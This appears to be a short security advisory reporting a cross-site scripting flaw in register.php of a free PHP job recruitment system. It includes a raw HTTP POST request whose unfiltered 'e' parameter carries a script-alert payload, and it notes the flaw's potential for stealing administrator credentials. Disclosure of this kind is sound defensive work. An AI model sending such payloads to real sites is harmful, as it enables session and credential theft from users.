https://code-projects.org/job-recruitment-in-php-css-javascript-and-mysql-free-download/
register.php
There is an Cross Site Scripting vulnerability in Job_Recruitment systtem in register.php, Control parameter: $e
A malicious attacker can use this vulnerability to obtain administrator login credentials or phishing websites
The $_POST['e'] parameters of the register.php are not filtered and concatenated into the $userstring1,and echo $userstring1 value is not filtered.
POST /register.php HTTP/1.1
Host: airecruitmentsystem
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Contnet-Length: 10
Connection: close
Cookie: PHPSESSID=apdbj581m83cio8cj275e494dr
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 42
e=<script>alert(1);</script>&p1=123456
Result
it can excute the Cross Site Scripting : alert(1);
Discover
西安电子科技大学 李腾,谢亚轩